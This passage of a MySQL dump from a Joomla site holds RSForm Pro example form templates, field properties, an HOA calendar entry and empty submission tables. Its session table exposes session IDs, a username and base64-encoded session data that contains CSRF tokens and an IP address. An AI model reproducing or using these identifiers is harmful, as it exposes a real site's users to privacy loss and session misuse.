form. You can use it for SEO purposes.','rsform, contact, form, joomla','(*)','<p class=\"formRed\">Please complete all required fields!</p>',', ',1,'','userForm','','','',0,'',1,0,0),(2,'RSformPro Multipage example','<fieldset class=\"formFieldset\">\n<legend>{global:formtitle}</legend>\n{error}\n<!-- Do not remove this ID, it is used to identify the page so that the pagination script can work correctly -->\n<ol class=\"formContainer\" id=\"rsform_2_page_0\">\n <li class=\"rsform-block rsform-block-header\">\n <div class=\"formCaption\">{Header:caption}</div>\n <div class=\"formBody\">{Header:body}<span class=\"formClr\">{Header:validation}</span></div>\n <div class=\"formDescription\">{Header:description}</div>\n </li>\n <li class=\"rsform-block rsform-block-fullname\">\n <div class=\"formCaption\">{FullName:caption}<strong class=\"formRequired\">(*)</strong></div>\n <div class=\"formBody\">{FullName:body}<span class=\"formClr\">{FullName:validation}</span></div>\n <div class=\"formDescription\">{FullName:description}</div>\n </li>\n <li class=\"rsform-block rsform-block-email\">\n <div class=\"formCaption\">{Email:caption}<strong class=\"formRequired\">(*)</strong></div>\n <div class=\"formBody\">{Email:body}<span class=\"formClr\">{Email:validation}</span></div>\n <div class=\"formDescription\">{Email:description}</div>\n </li>\n <li class=\"rsform-block rsform-block-page1\">\n <div class=\"formCaption\"> </div>\n <div class=\"formBody\">{Page1:body}</div>\n </li>\n </ol>\n<!-- Do not remove this ID, it is used to identify the page so that the pagination script can work correctly -->\n<ol class=\"formContainer\" id=\"rsform_2_page_1\">\n <li class=\"rsform-block rsform-block-companyheader\">\n <div class=\"formCaption\">{CompanyHeader:caption}</div>\n <div class=\"formBody\">{CompanyHeader:body}<span class=\"formClr\">{CompanyHeader:validation}</span></div>\n <div class=\"formDescription\">{CompanyHeader:description}</div>\n </li>\n <li class=\"rsform-block rsform-block-companysize\">\n <div class=\"formCaption\">{CompanySize:caption}<strong class=\"formRequired\">(*)</strong></div>\n <div class=\"formBody\">{CompanySize:body}<span class=\"formClr\">{CompanySize:validation}</span></div>\n <div class=\"formDescription\">{CompanySize:description}</div>\n </li>\n <li class=\"rsform-block rsform-block-position\">\n <div class=\"formCaption\">{Position:caption}<strong class=\"formRequired\">(*)</strong></div>\n <div class=\"formBody\">{Position:body}<span class=\"formClr\">{Position:validation}</span></div>\n <div class=\"formDescription\">{Position:description}</div>\n </li>\n <li class=\"rsform-block rsform-block-page2\">\n <div class=\"formCaption\"> </div>\n <div class=\"formBody\">{Page2:body}</div>\n </li>\n </ol>\n<!-- Do not remove this ID, it is used to identify the page so that the pagination script can work correctly -->\n<ol class=\"formContainer\" id=\"rsform_2_page_2\">\n <li class=\"rsform-block rsform-block-contactheader\">\n <div class=\"formCaption\">{ContactHeader:caption}</div>\n <div class=\"formBody\">{ContactHeader:body}<span class=\"formClr\">{ContactHeader:validation}</span></div>\n <div class=\"formDescription\">{ContactHeader:description}</div>\n </li>\n <li class=\"rsform-block rsform-block-contactby\">\n <div class=\"formCaption\">{ContactBy:caption}</div>\n <div class=\"formBody\">{ContactBy:body}<span class=\"formClr\">{ContactBy:validation}</span></div>\n <div class=\"formDescription\">{ContactBy:description}</div>\n </li>\n <li class=\"rsform-block rsform-block-contactwhen\">\n <div class=\"formCaption\">{ContactWhen:caption}<strong class=\"formRequired\">(*)</strong></div>\n <div class=\"formBody\">{ContactWhen:body}<span class=\"formClr\">{ContactWhen:validation}</span></div>\n <div class=\"formDescription\">{ContactWhen:description}</div>\n </li>\n <li class=\"rsform-block rsform-block-submit\">\n <div class=\"formCaption\">{Submit:caption}</div>\n <div class=\"formBody\">{Submit:body}<span class=\"formClr\">{Submit:validation}</span></div>\n <div class=\"formDescription\">{Submit:description}</div>\n </li>\n <li class=\"rsform-block rsform-block-footer\">\n <div class=\"formCaption\">{Footer:caption}</div>\n <div class=\"formBody\">{Footer:body}<span class=\"formClr\">{Footer:validation}</span></div>\n <div class=\"formDescription\">{Footer:description}</div>\n </li>\n</ol>\n</fieldset>','inline-xhtml',1,'','','RSForm! Pro Multipage example',1,'','',0,'<p>Dear {FullName:value},</p><p> thank you for your submission. One of our staff members will contact you by {ContactBy:value} as soon as possible.</p>',1,'<p>Dear {FullName:value},</p><p> we received your contact request. Someone will get back to you by {ContactBy:value} soon. </p>','{Email:value}','','','your@email.com','','Your Company','Contact confirmation',1,0,'','<p>Customize this e-mail also. You will receive it as administrator. </p><p>{FullName:caption}:{FullName:value}<br />\n{Email:caption}:{Email:value}<br />\n{CompanySize:caption}:{CompanySize:value}<br />\n{Position:caption}:{Position:value}<br />\n{ContactBy:caption}:{ContactBy:value}<br />\n{ContactWhen:caption}:{ContactWhen:value}</p>','youradminemail@email.com','','','{Email:value}','','Your Company','Contact',1,'','','','','',0,'This is the meta description of your form. You can use it for SEO purposes.','rsform, contact, form, joomla','(*)','<p class=\"formRed\">Please complete all required fields!</p>',', ',1,'','userForm','','','',0,'',1,0,0); /*!40000 ALTER TABLE `jos_rsform_forms` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `jos_rsform_mappings` -- DROP TABLE IF EXISTS `jos_rsform_mappings`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `jos_rsform_mappings` ( `id` int(11) NOT NULL AUTO_INCREMENT, `formId` int(11) NOT NULL, `connection` tinyint(1) NOT NULL, `host` varchar(255) NOT NULL, `port` int(10) NOT NULL, `username` varchar(255) NOT NULL, `password` varchar(255) NOT NULL, `database` varchar(255) NOT NULL, `method` tinyint(1) NOT NULL, `table` varchar(255) NOT NULL, `data` text NOT NULL, `wheredata` text NOT NULL, `extra` text NOT NULL, `andor` text NOT NULL, `ordering` int(11) NOT NULL, PRIMARY KEY (`id`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `jos_rsform_mappings` -- LOCK TABLES `jos_rsform_mappings` WRITE; /*!40000 ALTER TABLE `jos_rsform_mappings` DISABLE KEYS */; /*!40000 ALTER TABLE `jos_rsform_mappings` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `jos_rsform_properties` -- DROP TABLE IF EXISTS `jos_rsform_properties`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `jos_rsform_properties` ( `PropertyId` int(11) NOT NULL AUTO_INCREMENT, `ComponentId` int(11) NOT NULL DEFAULT '0', `PropertyName` text NOT NULL, `PropertyValue` text NOT NULL, UNIQUE KEY `PropertyId` (`PropertyId`), KEY `ComponentId` (`ComponentId`) ) ENGINE=InnoDB AUTO_INCREMENT=151 DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `jos_rsform_properties` -- LOCK TABLES `jos_rsform_properties` WRITE; /*!40000 ALTER TABLE `jos_rsform_properties` DISABLE KEYS */; INSERT INTO `jos_rsform_properties` VALUES (1,1,'NAME','FullName'),(2,1,'CAPTION','Full Name'),(3,1,'REQUIRED','YES'),(4,1,'SIZE','20'),(5,1,'MAXSIZE',''),(6,1,'VALIDATIONRULE','none'),(7,1,'VALIDATIONMESSAGE','Please type your full name.'),(8,1,'ADDITIONALATTRIBUTES',''),(9,1,'DEFAULTVALUE',''),(10,1,'DESCRIPTION',''),(11,2,'NAME','Header'),(12,2,'TEXT','<b>This text describes the form. It is added using the Free Text component</b>. HTML code can be added directly here.'),(13,3,'NAME','Email'),(14,3,'CAPTION','E-mail'),(15,3,'REQUIRED','YES'),(16,3,'SIZE','20'),(17,3,'MAXSIZE',''),(18,3,'VALIDATIONRULE','email'),(19,3,'VALIDATIONMESSAGE','Invalid email address.'),(20,3,'ADDITIONALATTRIBUTES',''),(21,3,'DEFAULTVALUE',''),(22,3,'DESCRIPTION',''),(23,4,'NAME','CompanySize'),(24,4,'CAPTION','Number of Employees'),(25,4,'SIZE',''),(26,4,'MULTIPLE','NO'),(27,4,'ITEMS','|Please Select[c]\n1-20\n21-50\n51-100\n>100|More than 100'),(28,4,'REQUIRED','YES'),(29,4,'ADDITIONALATTRIBUTES',''),(30,4,'DESCRIPTION',''),(31,4,'VALIDATIONMESSAGE','Please tell us how big is your company.'),(32,5,'NAME','Position'),(33,5,'CAPTION','Position'),(34,5,'ITEMS','CEO\nCFO\nCTO\nHR[c]'),(35,5,'FLOW','HORIZONTAL'),(36,5,'REQUIRED','YES'),(37,5,'ADDITIONALATTRIBUTES',''),(38,5,'DESCRIPTION',''),(39,5,'VALIDATIONMESSAGE','Please specify your position in the company'),(40,6,'NAME','ContactBy'),(41,6,'CAPTION','How should we contact you?'),(42,6,'ITEMS','E-mail[c]\nPhone\nNewsletter[c]\nMail'),(43,6,'FLOW','HORIZONTAL'),(44,6,'REQUIRED','NO'),(45,6,'ADDITIONALATTRIBUTES',''),(46,6,'DESCRIPTION',''),(47,6,'VALIDATIONMESSAGE',''),(48,7,'NAME','ContactWhen'),(49,7,'CAPTION','When would you like to be contacted?'),(50,7,'REQUIRED','YES'),(51,7,'DATEFORMAT','dd.mm.yyyy'),(52,7,'CALENDARLAYOUT','POPUP'),(53,7,'ADDITIONALATTRIBUTES',''),(54,7,'READONLY','YES'),(55,7,'POPUPLABEL','...'),(56,7,'DESCRIPTION',''),(57,7,'VALIDATIONMESSAGE','Please select a date when we should contact you.'),(58,8,'NAME','Submit'),(59,8,'LABEL','Submit'),(60,8,'CAPTION',''),(61,8,'RESET','YES'),(62,8,'RESETLABEL','Reset'),(63,8,'ADDITIONALATTRIBUTES',''),(64,9,'NAME','Footer'),(65,9,'TEXT','This form is an example. Please check our knowledgebase for articles related to how you should build your form. Articles are updated daily. <a href=\"http://www.rsjoomla.com/\" target=\"_blank\">http://www.rsjoomla.com/</a>'),(68,10,'NAME','FullName'),(69,10,'CAPTION','Full Name'),(70,10,'REQUIRED','YES'),(71,10,'SIZE','20'),(72,10,'MAXSIZE',''),(73,10,'VALIDATIONRULE','none'),(74,10,'VALIDATIONMESSAGE','Please type your full name.'),(75,10,'ADDITIONALATTRIBUTES',''),(76,10,'DEFAULTVALUE',''),(77,10,'DESCRIPTION',''),(78,10,'VALIDATIONEXTRA',''),(79,11,'NAME','Header'),(80,11,'TEXT','<b>This text describes the form. It is added using the Free Text component</b>. HTML code can be added directly here.'),(81,12,'NAME','Email'),(82,12,'CAPTION','E-mail'),(83,12,'REQUIRED','YES'),(84,12,'SIZE','20'),(85,12,'MAXSIZE',''),(86,12,'VALIDATIONRULE','email'),(87,12,'VALIDATIONMESSAGE','Invalid email address.'),(88,12,'ADDITIONALATTRIBUTES',''),(89,12,'DEFAULTVALUE',''),(90,12,'DESCRIPTION',''),(91,12,'VALIDATIONEXTRA',''),(92,13,'NAME','CompanySize'),(93,13,'CAPTION','Number of Employees'),(94,13,'SIZE',''),(95,13,'MULTIPLE','NO'),(96,13,'ITEMS','|Please Select[c]\n1-20\n21-50\n51-100\n>100|More than 100'),(97,13,'REQUIRED','YES'),(98,13,'ADDITIONALATTRIBUTES',''),(99,13,'DESCRIPTION',''),(100,13,'VALIDATIONMESSAGE','Please tell us how big is your company.'),(101,14,'NAME','Position'),(102,14,'CAPTION','Position'),(103,14,'ITEMS','CEO\nCFO\nCTO\nHR[c]'),(104,14,'FLOW','HORIZONTAL'),(105,14,'REQUIRED','YES'),(106,14,'ADDITIONALATTRIBUTES',''),(107,14,'DESCRIPTION',''),(108,14,'VALIDATIONMESSAGE','Please specify your position in the company'),(109,15,'NAME','ContactBy'),(110,15,'CAPTION','How should we contact you?'),(111,15,'ITEMS','E-mail[c]\nPhone\nNewsletter[c]\nMail'),(112,15,'FLOW','HORIZONTAL'),(113,15,'REQUIRED','NO'),(114,15,'ADDITIONALATTRIBUTES',''),(115,15,'DESCRIPTION',''),(116,15,'VALIDATIONMESSAGE',''),(117,16,'NAME','ContactWhen'),(118,16,'CAPTION','When would you like to be contacted?'),(119,16,'REQUIRED','YES'),(120,16,'DATEFORMAT','dd.mm.yyyy'),(121,16,'CALENDARLAYOUT','POPUP'),(122,16,'ADDITIONALATTRIBUTES',''),(123,16,'READONLY','YES'),(124,16,'POPUPLABEL','...'),(125,16,'DESCRIPTION',''),(126,16,'VALIDATIONMESSAGE','Please select a date when we should contact you.'),(127,17,'NAME','Submit'),(128,17,'LABEL','Submit'),(129,17,'CAPTION',''),(130,17,'RESET','YES'),(131,17,'RESETLABEL','Reset'),(132,17,'ADDITIONALATTRIBUTES',''),(133,18,'NAME','Footer'),(134,18,'TEXT','This form is an example. Please check our knowledgebase for articles related to how you should build your form. Articles are updated daily. <a href=\"http://www.rsjoomla.com/\" target=\"_blank\">http://www.rsjoomla.com/</a>'),(135,19,'NAME','Page1'),(136,19,'NEXTBUTTON','Next >'),(137,19,'PREVBUTTON','Prev'),(138,19,'ADDITIONALATTRIBUTES',''),(139,20,'NAME','Page2'),(140,20,'NEXTBUTTON','Next >'),(141,20,'PREVBUTTON','Prev'),(142,20,'ADDITIONALATTRIBUTES',''),(143,21,'NAME','CompanyHeader'),(144,21,'TEXT','Please tell us a little about your company.'),(145,22,'NAME','ContactHeader'),(146,22,'TEXT','Please let us know how and when to contact you.'),(147,1,'VALIDATIONEXTRA',''),(148,3,'VALIDATIONEXTRA',''),(149,10,'VALIDATIONEXTRA',''),(150,12,'VALIDATIONEXTRA',''); /*!40000 ALTER TABLE `jos_rsform_properties` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `jos_rsform_submission_columns` -- DROP TABLE IF EXISTS `jos_rsform_submission_columns`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `jos_rsform_submission_columns` ( `FormId` int(11) NOT NULL, `ColumnName` varchar(255) NOT NULL, `ColumnStatic` tinyint(1) NOT NULL, PRIMARY KEY (`FormId`,`ColumnName`,`ColumnStatic`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `jos_rsform_submission_columns` -- LOCK TABLES `jos_rsform_submission_columns` WRITE; /*!40000 ALTER TABLE `jos_rsform_submission_columns` DISABLE KEYS */; /*!40000 ALTER TABLE `jos_rsform_submission_columns` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `jos_rsform_submission_values` -- DROP TABLE IF EXISTS `jos_rsform_submission_values`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `jos_rsform_submission_values` ( `SubmissionValueId` int(11) NOT NULL AUTO_INCREMENT, `FormId` int(11) NOT NULL, `SubmissionId` int(11) NOT NULL DEFAULT '0', `FieldName` text NOT NULL, `FieldValue` text NOT NULL, PRIMARY KEY (`SubmissionValueId`), KEY `FormId` (`FormId`), KEY `SubmissionId` (`SubmissionId`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `jos_rsform_submission_values` -- LOCK TABLES `jos_rsform_submission_values` WRITE; /*!40000 ALTER TABLE `jos_rsform_submission_values` DISABLE KEYS */; /*!40000 ALTER TABLE `jos_rsform_submission_values` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `jos_rsform_submissions` -- DROP TABLE IF EXISTS `jos_rsform_submissions`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `jos_rsform_submissions` ( `SubmissionId` int(11) NOT NULL AUTO_INCREMENT, `FormId` int(11) NOT NULL DEFAULT '0', `DateSubmitted` datetime NOT NULL, `UserIp` varchar(15) NOT NULL DEFAULT '', `Username` varchar(255) NOT NULL DEFAULT '', `UserId` text NOT NULL, `Lang` varchar(255) NOT NULL, `confirmed` tinyint(1) NOT NULL, PRIMARY KEY (`SubmissionId`), KEY `FormId` (`FormId`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `jos_rsform_submissions` -- LOCK TABLES `jos_rsform_submissions` WRITE; /*!40000 ALTER TABLE `jos_rsform_submissions` DISABLE KEYS */; /*!40000 ALTER TABLE `jos_rsform_submissions` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `jos_rsform_translations` -- DROP TABLE IF EXISTS `jos_rsform_translations`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `jos_rsform_translations` ( `id` int(11) NOT NULL AUTO_INCREMENT, `form_id` int(11) NOT NULL, `lang_code` varchar(32) NOT NULL, `reference` varchar(255) NOT NULL, `reference_id` varchar(255) NOT NULL, `value` text NOT NULL, PRIMARY KEY (`id`), KEY `form_id` (`form_id`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `jos_rsform_translations` -- LOCK TABLES `jos_rsform_translations` WRITE; /*!40000 ALTER TABLE `jos_rsform_translations` DISABLE KEYS */; /*!40000 ALTER TABLE `jos_rsform_translations` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `jos_schemas` -- DROP TABLE IF EXISTS `jos_schemas`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `jos_schemas` ( `extension_id` int(11) NOT NULL, `version_id` varchar(20) NOT NULL, PRIMARY KEY (`extension_id`,`version_id`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `jos_schemas` -- LOCK TABLES `jos_schemas` WRITE; /*!40000 ALTER TABLE `jos_schemas` DISABLE KEYS */; INSERT INTO `jos_schemas` VALUES (700,'3.2.3-2014-02-20'),(10028,'3.1.1'),(10043,'3.0.6'),(10046,'2.5.6-2013-06-27'),(10050,'3.6.0-2012-07-31'); /*!40000 ALTER TABLE `jos_schemas` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `jos_session` -- DROP TABLE IF EXISTS `jos_session`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `jos_session` ( `session_id` varchar(200) NOT NULL DEFAULT '', `client_id` tinyint(3) unsigned NOT NULL DEFAULT '0', `guest` tinyint(4) unsigned DEFAULT '1', `time` varchar(14) DEFAULT '', `data` mediumtext, `userid` int(11) DEFAULT '0', `username` varchar(150) DEFAULT '', PRIMARY KEY (`session_id`), KEY `userid` (`userid`), KEY `time` (`time`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `jos_session` -- LOCK TABLES `jos_session` WRITE; /*!40000 ALTER TABLE `jos_session` DISABLE KEYS */; INSERT INTO `jos_session` VALUES ('23hls2oekjhe5frlte1vhs8ol2',1,0,'1523833452','joomla|s:1096:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjo0OntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjQ6e3M6NzoiY291bnRlciI7aTo0O3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTUyMzgzMzQyMTtzOjQ6Imxhc3QiO2k6MTUyMzgzMzQzMztzOjM6Im5vdyI7aToxNTIzODMzNDUxO31zOjY6ImNsaWVudCI7Tzo4OiJzdGRDbGFzcyI6MTp7czo5OiJmb3J3YXJkZWQiO3M6MTI6Ijk4LjE2OS41My44OCI7fXM6NToidG9rZW4iO3M6MzI6ImpqTXRIN0dDWTVPU0YyVmR2ZU9ySDVoZXZqREZieFhZIjt9czo4OiJyZWdpc3RyeSI7TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjA6e31zOjE0OiIAKgBpbml0aWFsaXplZCI7YjowO3M6OToic2VwYXJhdG9yIjtzOjE6Ii4iO31zOjQ6InVzZXIiO086MjA6Ikpvb21sYVxDTVNcVXNlclxVc2VyIjoxOntzOjI6ImlkIjtzOjI6IjUwIjt9czoxMToiYXBwbGljYXRpb24iO086ODoic3RkQ2xhc3MiOjE6e3M6NToicXVldWUiO2E6MTp7aTowO2E6Mjp7czo3OiJtZXNzYWdlIjtzOjg2OiJKQXV0aGVudGljYXRpb246IDphdXRoZW50aWNhdGU6IEZhaWxlZCB0byBsb2FkIHBsdWdpbjogcGxnYXV0aGVudGljYXRpb25sb2dpbmZhaWxlZGxvZyI7czo0OiJ0eXBlIjtzOjc6Indhcm5pbmciO319fX19czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9\";',50,'jaranha'),('25dd7d45bceb9252f72d5a435eebd0ca',0,1,'1522528554','joomla|s:644:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjI6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTUyMjUyODU1MztzOjQ6Imxhc3QiO2k6MTUyMjUyODU1MztzOjM6Im5vdyI7aToxNTIyNTI4NTUzO319czo4OiJyZWdpc3RyeSI7TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjA6e31zOjE0OiIAKgBpbml0aWFsaXplZCI7YjoxO3M6OToic2VwYXJhdG9yIjtzOjE6Ii4iO31zOjQ6InVzZXIiO086NToiSlVzZXIiOjE6e3M6MjoiaWQiO2k6MDt9fX1zOjE0OiIAKgBpbml0aWFsaXplZCI7YjowO3M6OToic2VwYXJhdG9yIjtzOjE6Ii4iO30=\";',0,''),('ds5b37f283f1rh5mm1le16ct52',0,1,'1523833398','joomla|s:824:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjQ6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTUyMzgzMzM5NztzOjQ6Imxhc3QiO2k6MTUyMzgzMzM5NztzOjM6Im5vdyI7aToxNTIzODMzMzk3O31zOjY6ImNsaWVudCI7Tzo4OiJzdGRDbGFzcyI6MTp7czo5OiJmb3J3YXJkZWQiO3M6MTI6Ijk4LjE2OS41My44OCI7fXM6NToidG9rZW4iO3M6MzI6IjdLT1E4ZXRETXUzVk5nem91NzNsUmNpMENETEEzNnBIIjt9czo4OiJyZWdpc3RyeSI7TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjA6e31zOjE0OiIAKgBpbml0aWFsaXplZCI7YjowO3M6OToic2VwYXJhdG9yIjtzOjE6Ii4iO31zOjQ6InVzZXIiO086MjA6Ikpvb21sYVxDTVNcVXNlclxVc2VyIjoxOntzOjI6ImlkIjtpOjA7fX19czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9\";',0,''); /*!40000 ALTER TABLE `jos_session` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `jos_simplecalendar` -- DROP TABLE IF EXISTS `jos_simplecalendar`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `jos_simplecalendar` ( `id` int(11) NOT NULL AUTO_INCREMENT, `asset_id` int(11) NOT NULL DEFAULT '0', `start_dt` date DEFAULT NULL, `end_dt` date DEFAULT NULL, `start_time` time DEFAULT NULL, `end_time` time DEFAULT NULL, `reserve_dt` date DEFAULT NULL, `name` varchar(150) DEFAULT '', `alias` varchar(150) DEFAULT '', `venue` varchar(150) DEFAULT '', `address` varchar(150) NOT NULL, `catid` int(11) DEFAULT '0', `statusid` int(11) DEFAULT '0', `latlon` varchar(150) DEFAULT '', `organizer_id` int(11) DEFAULT '0', `description` varchar(255) DEFAULT NULL, `contact_name` varchar(64) DEFAULT '', `contact_email` varchar(64) DEFAULT '', `contact_website` varchar(64) DEFAULT '', `contact_telephone` varchar(32) DEFAULT '', `created_dt` datetime DEFAULT NULL, `modified_dt` datetime DEFAULT NULL, `state` int(1) DEFAULT '1', `created_by` int(11) NOT NULL, `modified_by` int(11) NOT NULL, `featured` int(1) NOT NULL DEFAULT '0', `customfield1` varchar(128) NOT NULL, `customfield2` varchar(128) NOT NULL, `price` varchar(128) NOT NULL, `params` varchar(255) NOT NULL, `hits` int(11) NOT NULL DEFAULT '0', `metakey` text NOT NULL, `metadesc` text NOT NULL, `access` int(11) NOT NULL DEFAULT '1', PRIMARY KEY (`id`) ) ENGINE=InnoDB AUTO_INCREMENT=5 DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `jos_simplecalendar` -- LOCK TABLES `jos_simplecalendar` WRITE; /*!40000 ALTER TABLE `jos_simplecalendar` DISABLE KEYS */; INSERT INTO `jos_simplecalendar` VALUES (4,64,'2013-09-19','2013-12-31','50:00:00','50:00:00','0000-00-00','HHHOA Monthly Board Meeting','hhhoa-monthly-board-meeting-bc31d01','NA','',11,0,'',0,'','','','','','2013-09-19 15:50:23','0000-00-00 00:00:00',1,47,0,0,'','','','',0,'','',1); /*!40000 ALTER TABLE `jos_simplecalendar` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `jos_simplecalendar_organizers` -- DROP TABLE IF EXISTS `jos_simplecalendar_organizers`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `jos_simplecalendar_organizers` ( `id` int(11) NOT NULL AUTO_INCREMENT, `abbr` varchar(6) DEFAULT NULL, `name` varchar(64) DEFAULT NULL, `alias` varchar(64) DEFAULT NULL, `latlon` varchar(64) DEFAULT NULL, `address` varchar(255) DEFAULT NULL, `contact_name` varchar(64) DEFAULT NULL, `contact_email` varchar(64) DEFAULT NULL, `contact_website` varchar(64) DEFAULT NULL, `contact_telephone` varchar(32) DEFAULT NULL, `ordering` int(11) NOT NULL DEFAULT '0', `state` int(1) NOT NULL DEFAULT '1', `created_by` int(11) DEFAULT NULL, `created_dt` date DEFAULT NULL, `modified_by` int(11) DEFAULT NULL, `modified_dt` date DEFAULT NULL, `params` varchar(255) NOT NULL, PRIMARY KEY (`id`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `jos_simplecalendar_organizers` -- LOCK TABLES `jos_simplecalendar_organizers` WRITE; /*!40000 ALTER TABLE `jos_simplecalendar_organizers` DISABLE KEYS */; /*!40000 ALTER TABLE `jos_simplecalendar_organizers` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `jos_simplecalendar_statuses` -- DROP TABLE IF EXISTS `jos_simplecalendar_statuses`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `jos_simplecalendar_statuses` ( `id` int(11) NOT NULL AUTO_INCREMENT, `name` varchar(255) NOT NULL, `alias` varchar(255) NOT NULL, `color` varchar(8) NOT NULL, `ordering` int(11) NOT NULL DEFAULT '0', `state` int(11) NOT NULL DEFAULT '1', `created_by` int(11) NOT NULL, `created_dt` date NOT NULL, `modified_by` int(11) NOT NULL, `modified_dt` date NOT NULL, PRIMARY KEY (`id`) ) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `jos_simplecalendar_statuses` -- LOCK TABLES `jos_simplecalendar_statuses` WRITE; /*!40000 ALTER TABLE `jos_simplecalendar_statuses` DISABLE KEYS */; INSERT INTO `jos_simplecalendar_statuses` VALUES (1,'Confirmed','confirmed','35FF1F',1,1,89,'2013-04-25',89,'2013-04-25'); /*!40000 ALTER TABLE `jos_simplecalendar_statuses` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `jos_tags` -- DROP TABLE IF EXISTS `jos_tags`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `jos_tags` ( `id` int(10) unsigned NOT NULL AUTO_INCREMENT, `parent_id` int(10) unsigned NOT NULL DEFAULT '0', `lft` int(11) NOT NULL DEFAULT '0', `rgt` int(11) NOT NULL DEFAULT '0', `level` int(10) unsigned NOT NULL DEFAULT '0', `path` varchar(255) NOT NULL DEFAULT '', `title` varchar(255) NOT NULL, `alias` varchar(255) CHARACTER SET utf8 COLLATE utf8_bin NOT NULL DEFAULT '', `note` varchar(255) NOT NULL DEFAULT '', `description` mediumtext NOT NULL, `published` tinyint(1) NOT NULL DEFAULT '0', `checked_out` int(11) unsigned NOT NULL DEFAULT '0', `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `access` int(10) unsigned NOT NULL DEFAULT '0', `params` text NOT NULL, `metadesc` varchar(1024) NOT NULL COMMENT 'The meta description for the page.', 